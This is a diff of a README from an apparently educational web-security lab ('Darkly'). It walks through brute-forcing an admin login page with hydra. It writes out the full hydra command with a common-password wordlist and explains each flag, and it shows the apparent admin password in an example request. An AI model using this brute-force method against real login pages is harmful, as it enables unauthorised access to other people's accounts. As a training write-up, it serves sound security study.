vsteffen/Darkly/bruteforce_login/Ressources/README.txt

 We visit the URL "index.php?page=signin".
 We have a sign in page.
 Well, guessing the admin have the username "admin", it's time to bruteforce.
 For this, i used hydra who is a parallelized login cracker which supports numerous protocols to attack.
-For us, i used the following command: hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz -F -o hydra.log 192.168.0.30 http-get-form /index.php:page=signin&username=^USER^&password=^PASS^&Login=Login:F=images/WrongAnswer.gif
+For us, i used the following command: hydra -l admin -P /root/dictionary/10-million-password-list-top-500.txt -F -o hydra.log x.x.x.x http-get-form '/index.php:page=signin&username=^USER^&password=^PASS^&Login=Login:F=images/WrongAnswer.gif'
 Let's decrypt it :
 -l -> specify the username to attack
--P -> path to use our wordlist rockyou.txt.gz -> famous wordlist with the most common passwords.
-Present by default in Kali -F -> end the session if one request is positive
+-P -> path to use our wordlist 10-million-password-list-top-500.txt -> famous wordlist with the most common passwords (get in Dockerfile) -F -> end the session if one request is positive
 -o -> just the output of hydra (you can check it : hydra.log) http-get-form -> the protocol we want to use (form use get request -> index.php?page=signin&username=admin&password=shadow&Login=Login)